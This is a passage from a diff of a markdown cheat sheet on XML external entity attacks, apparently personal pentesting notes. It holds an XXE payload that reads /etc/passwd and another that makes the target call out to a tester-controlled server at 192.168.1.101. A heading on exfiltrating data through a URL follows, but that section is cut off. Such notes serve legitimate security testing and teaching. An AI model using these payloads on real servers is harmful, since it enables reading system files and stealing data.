Reboare/security/xml_external_entity_attack.md

 <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
 ```

 Another way to test it is to see if the server tries to download the external script.
-Firs t you need to set up your own webserver, and then wait for it to connect.
+First you need to set up your own webserver, and then wait for it to connect.

 ```
 <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://192.168.1.101/fil.txt">]><test>&xxe;</test>
 ```

+## Blind XXE

+In some cases, you won't receive any output from the

 ### Exfiltrate data through URL